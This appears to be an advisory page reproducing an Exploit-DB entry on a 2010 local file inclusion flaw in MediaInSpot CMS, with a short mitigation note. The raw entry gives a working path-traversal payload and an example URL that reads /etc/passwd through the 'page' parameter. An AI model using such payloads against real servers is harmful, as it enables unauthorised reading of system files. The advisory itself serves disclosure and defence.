MediaInSpot CMS LFI Vulnerability

vendor:

CMS

by:

Amoo Arash

8,8

CVSS

HIGH

Local File Inclusion (LFI)

CWE

Product Name: CMS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

MediaInSpot CMS LFI Vulnerability

A Local File Inclusion (LFI) vulnerability exists in MediaInSpot CMS, which allows an attacker to include a file from the local file system of the web server. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable application. The vulnerable parameter is ‘page’, which can be used to include a file from the local file system of the web server. An attacker can include the ‘/etc/passwd’ file by sending a maliciously crafted HTTP request to the vulnerable application.

Mitigation:

To mitigate this vulnerability, the application should be configured to only allow the inclusion of files from a specific directory. Additionally, the application should be configured to only allow the inclusion of files with specific extensions.

Source

Exploit-DB raw data:

# Title : MediaInSpot CMS LFI Vulnerability
# Author: Amoo Arash
# Date : 2010-04-10

[~]######################################### InformatioN #############################################[~]

[~] Title : MediaInSpot CMS LFI Vulnerability
[~] Author : Amoo Arash

[~]######################################### ExploiT #############################################[~]

[~] Vulnerable File :

http://127.0.0.1/view/lang/index.php?page=?page=[LFI]

[~] ExploiT :

../../../../../../../etc/passwd

[~] Example :

http://127.0.0.1/view/lang/index.php?page=?page=../../../../../../../etc/passwd


[~]######################################### FinisH :D #############################################[~]